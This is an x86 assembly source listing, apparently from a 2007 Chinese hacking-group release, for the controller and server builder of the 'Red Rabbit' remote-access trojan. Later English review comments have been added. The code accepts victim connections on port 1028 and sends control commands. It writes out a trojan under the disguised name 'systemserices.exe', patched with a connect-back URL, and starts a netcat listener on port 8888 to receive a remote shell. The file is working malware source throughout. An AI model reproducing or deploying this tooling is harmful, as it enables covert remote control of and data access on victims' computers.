
📄 redrabbit.asm

📁 红狼安全小组编写的赤兔远控程序源码,学windows下32位汇编的同志可以看看~
;******************************************************
;程序编写by Asm
;日期:2007-4-10日
;出处:http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组(http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include		windows.inc
include		user32.inc
includelib	user32.lib
include		kernel32.inc
includelib	kernel32.lib
include		wsock32.inc
includelib	wsock32.lib
include		shell32.inc
includelib	shell32.lib
include macros.inc

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ constant definitions
; Resource and dialog-control identifiers. The roles noted on each line
; are taken from how the ID is used in the code section of this file;
; the resource script that defines the dialogs is not part of this
; listing, so control types are not confirmed.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN	equ		1000h	;icon
DLG_MAIN	equ		1	;main dialog, handled by _ProcDlgMain
DLG_LOOK equ      2	;dialog handled by _ProcLook (server generation)
IDB_1		equ	   3	;not referenced in this listing
DLG_SEND equ      4	;dialog handled by _ProcSendFile
IDC_Process	equ	1001	;sends the one-byte command "l" to the peer
IDC_MingLing	equ	1002	;list box that shows text received from the peer
IDC_Close	equ	1003	;sends the one-byte command "o" to the peer
IDC_Cmd	equ	1004	;starts a local NC.exe listener, then sends "c"
IDC_Serices	equ	1005	;sends the one-byte command "e" to the peer
IDC_BMP	equ	1006	;not referenced in this listing
IDC_ServerList	equ	1007	;list box filled by _AddClient
IDC_Upfile	equ	1008	;opens DLG_SEND
IDC_Out	equ	1009	;sends WM_CLOSE to the main dialog
IDC_ShuoMing	equ	1010	;shows the szSay "about" text
IDC_URL  equ 1011	;URL edit field read by _ProcLook
IDC_23  equ  1012	;in DLG_LOOK: calls _GetServer with the URL
IDC_24  equ  1013	;in DLG_LOOK: shows the szLook help text
IDC_25  equ 1014	;in DLG_SEND: file-path field
IDC_26  equ 1015	;in DLG_SEND: sends the file-path string to the peer


ASM   equ 101	;RT_RCDATA resource ID extracted by _GetServer
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data section
; All state is global. The two 32 KiB buffers are shared by every
; thread started on _RecvData; no lock is visible in this file.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance	dd		?	;module handle, set at start
hWinMain	   dd	?	;main dialog window handle, set on WM_INITDIALOG
hSocket		dd	?	;listening socket created in _Init
dwCount		dd	?	;connection counter incremented by _AddClient
szReadBuffer	db	32768 dup (?)	;raw bytes from recv
szBuffer	db	32768 dup (?)	;wsprintf output / list-box text
hSocket1 dd ?	;socket returned by accept in _Init; used for every send/recv
szCurrentDirectory db 1024 dup(?)	;result of GetCurrentDirectory
szCurrentDirectory1 db 1024 dup(?)	;<current directory>\NC.exe path built for CreateProcess
szUrl db 1024 dup(?)	;URL text read from IDC_URL
szFilePath db 1024 dup(?)	;path text read from IDC_25
stStartUp	STARTUPINFO		<?>	;filled by GetStartupInfo before CreateProcess
stProcInfo	PROCESS_INFORMATION	<?>	;filled by CreateProcess
.data
szFormat	db	'%s',13,10,0	;wsprintf format used by _RecvData
; szSay: "about" text shown for IDC_ShuoMing. It states that the program
; listens on port 1028 by default, supports a single client connection,
; and that this first version is limited to cmd, process viewing,
; information viewing, file viewing and logging off the host.
szSay  db '这个程序是偶学习TCP/IP协议的一个作品',13,10
       db '默认监听端口是1028,只支持一个用户连接',13,10
       db '并且只使用一次,HOHO~~~~',13,10
       db '偶的汇编功底都JB烂死了,所以这程序bug多多',13,10
       db '同时又碰巧快到6月份高考,偶上网的时间已经减少',13,10
       db '这样一来要想完善它,还得一步一步来',13,10
       db '偶发布的这个版本是最初版本',13,10
       db '功能也仅仅限制于cmd,进程查看,信息查看,文件查看,注销主机',13,10
       db '当然,这个程序是开源的,我们一起来完善它,看谁写得好 *^_^*',13,10
       db '我的QQ:448761813,欢迎交流',13,10
       db 'By asm 2007-4-9',13,10,0
; szLook: help text shown for IDC_24. It states that the generated server
; is configured with a web URL rather than an IP address, and that the
; text file at that URL contains the operator's IP.
szLook db '本程序采用网页连接的方式,不支持IP',13,10
       db '比如 Http://bbs.hackok/ip.txt 其中ip.txt的内容是你的IP',13,10,0 
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
		.code
;--------------------------------------------------------------------
; _AddClient
; Increments the global connection counter and appends an entry of the
; form "<count>--127.0.0.1" to the IDC_ServerList list box of the main
; dialog. The address part is a fixed literal: the peer's real address
; is never queried (_Init calls accept with null address arguments).
; In:    nothing (uses globals dwCount, szBuffer, hWinMain)
; Out:   eax = return value of SendDlgItemMessage
;--------------------------------------------------------------------
_AddClient	proc
		mov	eax,dwCount
		inc	eax
		mov	dwCount,eax			; dwCount = dwCount + 1
		invoke	wsprintf,offset szBuffer,CTXT("%d--127.0.0.1"),eax
		invoke	SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,offset szBuffer
		ret
_AddClient	endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _RecvData
; Thread routine (started with CreateThread from the dialog procedures,
; with hSocket1 as the parameter). Clears the IDC_MingLing list box,
; then repeatedly receives from the socket and appends each chunk,
; formatted with szFormat, as a new list-box entry.
; In:    _hSocket = connected socket to read from
; Out:   eax = whatever the last call left there; no status is returned
; Uses the global buffers szReadBuffer and szBuffer. Several threads can
; run this routine at once and no synchronisation is visible here.
; NOTE(review): everything displayed comes straight from the network
; peer; the traffic is plain text with no authentication in this file.
;--------------------------------------------------------------------
_RecvData	proc	_hSocket
		local	@dwRecv
		invoke SendDlgItemMessage,hWinMain,IDC_MingLing,LB_RESETCONTENT,0,0
		.while TRUE
		; both buffers are zeroed before every read
		invoke	RtlZeroMemory,addr szReadBuffer,sizeof szReadBuffer
		invoke	RtlZeroMemory,addr szBuffer,sizeof szBuffer
		; NOTE(review): recv may fill all 32768 bytes, in which case
		; szReadBuffer has no terminating NUL for lstrlen/wsprintf below.
		invoke	recv,_hSocket,addr szReadBuffer,sizeof szReadBuffer,NULL
			mov	@dwRecv,eax
		; the return value is not compared with SOCKET_ERROR; the code
		; relies on the string length of the zeroed buffer instead
		invoke lstrlen,addr szReadBuffer
		.if eax!=NULL
		invoke	wsprintf,addr szBuffer,addr szFormat,addr szReadBuffer
		invoke SendDlgItemMessage,hWinMain,IDC_MingLing,LB_ADDSTRING,0,addr szBuffer
		; NOTE(review): .elseif is written without a condition; it looks
		; like .else was intended - confirm how the assembler treats it
		.elseif
			jmp close
			.endif
		; recv returning 0 ends the loop
		.break .if @dwRecv==NULL
;********************************************************************
; Send to each client in the client list in turn
; (comment kept from the original; no send is performed here)
;********************************************************************
		.endw
		
	close:	
		ret
_RecvData	endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Initialise the socket, bind to the service TCP port and listen
;
; _Init is started as a thread from _ProcDlgMain on WM_INITDIALOG.
; It requests Winsock version 1.1 (101h), creates a TCP socket, binds it
; to INADDR_ANY (all interfaces) on port 1028, listens with a backlog of
; 5 and accepts exactly one connection, whose socket is stored in
; hSocket1. There is no accept loop, so only one peer is ever served.
; Out:   eax = return value of _AddClient
; NOTE(review): accept and _AddClient run even when bind failed, and the
; results of WSAStartup, socket and listen are not checked.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Init		proc
		local	@stWsa:WSADATA
		local	@stSin:sockaddr_in
		invoke	WSAStartup,101h,addr @stWsa
		invoke	socket,AF_INET,SOCK_STREAM,0
		mov	hSocket,eax

		invoke	RtlZeroMemory,addr @stSin,sizeof @stSin
		; port 1028 in network byte order
		invoke	htons,1028
		mov	@stSin.sin_port,ax
		mov	@stSin.sin_family,AF_INET
		mov	@stSin.sin_addr,INADDR_ANY
		invoke	bind,hSocket,addr @stSin,sizeof @stSin
		.if	eax ==	SOCKET_ERROR
			; message text: "Cannot bind to TCP port 1028, please check
			; whether another program is using it!"
			invoke	MessageBox,hWinMain,CTXT("无法绑定到TCP端口1028,请检查是否有其它程序在使用!"),NULL,\
				MB_OK or MB_ICONWARNING
			invoke	SendMessage,hWinMain,WM_CLOSE,0,0
		.else
			invoke	listen,hSocket,5
		.endif
		; peer address is not requested (both address arguments are 0)
		invoke	accept,hSocket,0,0
		; on failure the value FALSE (0) is stored as the socket handle
		.if	eax==INVALID_SOCKET
		mov eax,FALSE
		.endif
		mov hSocket1,eax
		invoke	_AddClient
		ret
_Init		endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;Subroutine that modifies the data at a given offset
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; MapViewFile
; Copies the NUL-terminated string _url to the fixed offset 26A0h
; inside the memory block at lpProcessAddress, then shows a message box
; (text: "Congratulations, the server has been generated!").
; In:    lpProcessAddress = base of the mapped view of the output file
;        _url             = pointer to the URL string
; Out:   eax = return value of MessageBox
; The offset is hard-coded and not checked against the size of the
; mapping; _GetServer limits the URL to 22..59 characters before calling.
; For analysis: the configured URL sits at file offset 26A0h of the
; generated executable.
MapViewFile proc uses ebx esi edi,lpProcessAddress:LPSTR,_url:DWORD
	mov	eax,lpProcessAddress		; base of the mapped view
	lea	edi,[eax+0026a0h]		; edi = base + 26A0h, the patch destination
	invoke	lstrcpy,edi,_url
	invoke	MessageBox,NULL,CTXT("恭喜,服务端生成完毕!"),CTXT("恭喜"),MB_ICONINFORMATION
	ret
MapViewFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _GetServer
; Generates the server executable for a given URL:
;   1. rejects URLs of 21 characters or fewer, or 60 or more;
;   2. locates the RT_RCDATA resource with ID ASM (101) in this module
;      and writes it to "systemserices.exe" (relative path, so it lands
;      in the current directory);
;   3. re-opens that file, maps it read/write and calls MapViewFile,
;      which copies the URL to offset 26A0h of the mapping.
; In:    _url = pointer to the NUL-terminated URL string
; Out:   eax = whatever the last call left there; no status is returned
; For analysis: the output file name and the fixed URL offset are
; stable artefacts of this builder.
; NOTE(review): the clean-up calls below sit outside the checks that
; guard the matching open calls, so they also run with uninitialised
; locals when an earlier step failed. lpData is allocated and freed but
; never used, and hRsrc/hResData are resource handles passed to
; CloseHandle.
;--------------------------------------------------------------------
_GetServer proc _url
local hRsrc,dwSize,hResData,lpData,lpRes,dwSizeWritten,hFile,hMapView,pMapView
invoke lstrlen,_url
    .if eax <= 21
    ; message text: "The URL is shorter than the reserved size, cannot generate!"
    invoke MessageBox,NULL,CTXT("填写的URL小于预定字节,无法生成!"),NULL,MB_ICONSTOP
    .elseif eax >= 60
    ; message text: "The URL is longer than the reserved size, cannot generate!"
    invoke MessageBox,NULL,CTXT("填写的URL大于预定字节,无法生成!"),NULL,MB_ICONSTOP
    ; NOTE(review): .elseif without a condition; .else appears intended
    .elseif
    invoke FindResource,NULL,ASM,RT_RCDATA;find the ASM resource
              mov hRsrc,eax
    invoke SizeofResource,NULL,hRsrc
    mov dwSize,eax
    invoke LoadResource,NULL,hRsrc
    mov hResData,eax
    invoke GlobalAlloc,GPTR,dwSize
    mov lpData,eax
    invoke LockResource,hResData
    mov lpRes,eax
    invoke CreateFile,CTXT("systemserices.exe"),GENERIC_WRITE,FILE_SHARE_READ,\
    NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL ;open the file
    ; NOTE(review): compared with NULL here, but with INVALID_HANDLE_VALUE
    ; for the second CreateFile below
    .if eax != NULL
        mov hFile,eax
    ; write the embedded resource out unchanged
    invoke WriteFile,hFile,lpRes,dwSize,addr dwSizeWritten,NULL
    invoke CloseHandle,hRsrc
    invoke CloseHandle,hResData
    invoke CloseHandle,hFile
    invoke GlobalFree,lpData
    .endif
    invoke CreateFile,CTXT("systemserices.exe"),GENERIC_READ or GENERIC_WRITE,\ ;open it
FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING, \         
FILE_ATTRIBUTE_NORMAL,NULL               
.if eax!=INVALID_HANDLE_VALUE
mov hFile, eax ;save the handle         
invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL;create the file mapping
.if eax!=NULL
mov hMapView,eax ;save the handle
invoke MapViewOfFile,hMapView,FILE_MAP_WRITE,0,0,NULL;map a view of the file
.if eax!=NULL
mov pMapView,eax ;save the view base address
; patch the URL into the mapped file
invoke MapViewFile,pMapView,_url
.endif
invoke UnmapViewOfFile,pMapView;unmap the view
.endif
invoke CloseHandle,hMapView;close the file-mapping handle
.endif
invoke CloseHandle,hFile;close the file
.endif
ret
_GetServer endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _ProcSendFile
; Dialog procedure for DLG_SEND. When IDC_26 is activated it reads the
; text of IDC_25 into szFilePath, sends that string as-is over hSocket1
; and starts a _RecvData thread to display the reply.
; Only the path string is transmitted here; no file is opened or read.
; In:    hWnd, wMsg, wParam, lParam = standard dialog-procedure arguments
; Out:   eax = TRUE for WM_CLOSE / WM_INITDIALOG / WM_COMMAND,
;              FALSE for every other message
;--------------------------------------------------------------------
_ProcSendFile	proc	uses ebx edi esi hWnd,wMsg,wParam,lParam
local ThreadId4
		mov	eax,wMsg
		.if	eax == WM_CLOSE
			invoke	EndDialog,hWnd,NULL
		.elseif	eax == WM_INITDIALOG
			invoke	LoadIcon,hInstance,ICO_MAIN
			invoke	SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
			; NOTE(review): same line as in _ProcLook; whether DLG_SEND
			; contains an IDC_URL control is not visible in this listing
			invoke SetDlgItemText,hWnd,IDC_URL,CTXT("http://127.0.0.1/1.txt")
		.elseif	eax == WM_COMMAND
			mov	eax,wParam
			; the whole wParam is compared, not only its low word
			.if	eax == IDC_26
				invoke GetDlgItemText,hWnd,IDC_25,addr szFilePath,sizeof szFilePath
				invoke lstrlen,addr szFilePath
				.if eax==NULL
					; message text: "The file path must not be empty"
					invoke MessageBox,hWnd,CTXT("文件路径不能为空"),NULL,MB_ICONSTOP
					; NOTE(review): .elseif without a condition; .else appears intended
					.elseif
				invoke lstrlen,addr szFilePath
				; the send result is not checked
				invoke send,hSocket1,addr szFilePath,eax,0
				invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId4
				; no lasting effect: eax is set to TRUE before returning
				xor eax,eax
				.endif
			.endif
		.else
			mov	eax,FALSE
			ret
		.endif
		mov	eax,TRUE
		ret
_ProcSendFile	endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _ProcLook
; Dialog procedure for DLG_LOOK, the server-generation dialog.
; IDC_23 reads the URL from IDC_URL into szUrl and passes it to
; _GetServer; IDC_24 shows the szLook help text.
; In:    hWnd, wMsg, wParam, lParam = standard dialog-procedure arguments
; Out:   eax = TRUE for WM_CLOSE / WM_INITDIALOG / WM_COMMAND,
;              FALSE for every other message
;--------------------------------------------------------------------
_ProcLook	proc	uses ebx edi esi hWnd,wMsg,wParam,lParam

		mov	eax,wMsg
		.if	eax == WM_CLOSE
			invoke	EndDialog,hWnd,NULL
		.elseif	eax == WM_INITDIALOG
			invoke	LoadIcon,hInstance,ICO_MAIN
			invoke	SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
			; default text placed in the URL field
			invoke SetDlgItemText,hWnd,IDC_URL,CTXT("http://127.0.0.1/1.txt")
		.elseif	eax == WM_COMMAND
			mov	eax,wParam
			; the whole wParam is compared, not only its low word
			.if	eax == IDC_23
				; szUrl is 1024 bytes; _GetServer enforces the 22..59 length window
				invoke GetDlgItemText,hWnd,IDC_URL,addr szUrl,sizeof szUrl
				invoke _GetServer,addr szUrl
			.elseif eax == IDC_24
				; caption text: "Configuration notes"
				invoke MessageBox,hWnd,addr szLook,CTXT("配置说明"),MB_ICONINFORMATION
			.endif
		.else
			mov	eax,FALSE
			ret
		.endif
		mov	eax,TRUE
		ret

_ProcLook	endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; _ProcDlgMain
; Dialog procedure for the main window (DLG_MAIN). On WM_INITDIALOG it
; records the window handle and starts the _Init listener thread. Each
; command button sends a one-byte ASCII command over hSocket1 and, for
; most of them, starts a _RecvData thread to show the reply:
;   IDC_Process -> "l"    IDC_Close   -> "o"
;   IDC_Cmd     -> "c"    IDC_Serices -> "e"
; What the peer does for each letter is not visible in this file;
; szSay lists cmd, process viewing, information viewing, file viewing
; and logging off the host as the features.
; In:    hWnd, wMsg, wParam, lParam = standard dialog-procedure arguments
; Out:   eax = TRUE for WM_CLOSE / WM_INITDIALOG / WM_COMMAND,
;              FALSE for every other message
; NOTE(review): hSocket1 is used without checking that a peer has
; connected, send results are ignored, and thread handles returned by
; CreateThread are never closed. The commands go out as plain text.
;--------------------------------------------------------------------
_ProcDlgMain	proc	uses ebx edi esi hWnd,wMsg,wParam,lParam
local ThreadId,ThreadId1,ThreadId2,ThreadId3
local @szBuffer[1024]:byte
		mov	eax,wMsg
		.if	eax == WM_CLOSE
		; only the listening socket is closed; hSocket1 is not
		invoke	closesocket,hSocket
			invoke	WSACleanup
			invoke	EndDialog,hWnd,NULL
		.elseif	eax == WM_INITDIALOG
			; hWinMain = hWnd
			push hWnd
			pop hWinMain
			invoke	LoadIcon,hInstance,ICO_MAIN
			invoke	SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
			; listener runs on its own thread because accept blocks
			invoke CreateThread,NULL,0,addr _Init,0,0,addr ThreadId
		.elseif	eax == WM_COMMAND
			mov	eax,wParam
			; low word of wParam = control ID
			.if	ax == IDOK
			; open the server-generation dialog
			invoke	DialogBoxParam,hInstance,DLG_LOOK,NULL,offset _ProcLook,NULL
		.elseif ax == IDC_Process
			invoke SendDlgItemMessage,hWnd,IDC_MingLing,LB_RESETCONTENT,0,0
			invoke lstrlen,CTXT("l")
			invoke send,hSocket1,CTXT("l"),eax,0
			; no effect: eax is overwritten by CreateThread
			xor eax,eax
			invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId2
		.elseif ax == IDC_MingLing
			; high word of wParam = notification code
			shr eax,16
			.if	ax ==	LBN_DBLCLK
;********************************************************************
; Show the list-box entry that was double-clicked
;********************************************************************
					; NOTE(review): the LB_GETCURSEL result is used without
					; an error check, and LB_GETTEXT copies into the
					; 1024-byte stack buffer with no length check; the
					; entries originate from data received from the peer
					invoke	SendMessage,lParam,LB_GETCURSEL,0,0
					lea	ecx,@szBuffer
					invoke	SendMessage,lParam,LB_GETTEXT,eax,ecx
				   ; caption text: "View information"
				   invoke MessageBox,NULL,addr @szBuffer,CTXT("信息查看"),MB_ICONINFORMATION
				   .endif
			.elseif ax == IDC_Close
				invoke SendDlgItemMessage,hWnd,IDC_MingLing,LB_RESETCONTENT,0,0
				invoke lstrlen,CTXT("o")
				invoke send,hSocket1,CTXT("o"),eax,0
				; no effect: eax is overwritten by CreateThread
				xor eax,eax
				invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId2
			.elseif ax == 	IDC_Cmd
				; build "<current directory>\NC.exe" in szCurrentDirectory1
				invoke RtlZeroMemory,addr szCurrentDirectory,sizeof szCurrentDirectory
				invoke RtlZeroMemory,addr szCurrentDirectory1,sizeof szCurrentDirectory1
				invoke GetCurrentDirectory,200,addr szCurrentDirectory
				invoke lstrcat,addr szCurrentDirectory1,addr szCurrentDirectory
				invoke lstrcat,addr szCurrentDirectory1,CTXT("\")
				invoke lstrcat,addr szCurrentDirectory1,CTXT("NC.exe")
				invoke	GetStartupInfo,addr stStartUp
		      ; start NC.exe on this machine as a verbose listener on TCP 8888;
		      ; the CreateProcess result and the process/thread handles in
		      ; stProcInfo are not checked or closed
		      invoke	CreateProcess,addr szCurrentDirectory1,CTXT(" -vv -l -p 8888"),NULL,NULL,NULL,\
			NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
			; then send "c"; presumably the peer connects to that
			; listener - not visible in this file, confirm against the server
			invoke lstrlen,CTXT("c")
			   invoke send,hSocket1,CTXT("c"),eax,0
			   ; no lasting effect: eax is set to TRUE before returning
			   xor eax,eax
			  .elseif ax == IDC_Serices 
			  	invoke lstrlen,CTXT("e")
				invoke send,hSocket1,CTXT("e"),eax,0
				invoke CreateThread,NULL,0,addr _RecvData,hSocket1,0,addr ThreadId3
				; no lasting effect: eax is set to TRUE before returning
				xor eax,eax
				.elseif ax == IDC_Upfile
				invoke SendDlgItemMessage,hWnd,IDC_MingLing,LB_RESETCONTENT,0,0	
				; open the file-path dialog
				invoke	DialogBoxParam,hInstance,DLG_SEND,NULL,offset _ProcSendFile,NULL
				.elseif ax == IDC_Out
					invoke SendMessage,hWnd,WM_CLOSE,0,0
					.elseif ax == IDC_ShuoMing
						; caption text: "About this program"
						invoke MessageBox,hWnd,addr szSay,CTXT("关于程序说明"),MB_ICONINFORMATION
			.endif
		.else
			mov	eax,FALSE
			ret
		.endif
		mov	eax,TRUE
		ret

_ProcDlgMain	endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------
; Program entry point: stores the module handle in hInstance, runs the
; main dialog (DLG_MAIN) modally with _ProcDlgMain as its procedure and
; exits the process with code 0 once the dialog is closed.
;--------------------------------------------------------------------
start:
		invoke	GetModuleHandle,0
		mov	hInstance,eax			; keep the module handle for LoadIcon/DialogBoxParam
		invoke	DialogBoxParam,eax,DLG_MAIN,0,addr _ProcDlgMain,0
		invoke	ExitProcess,0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
		end	start
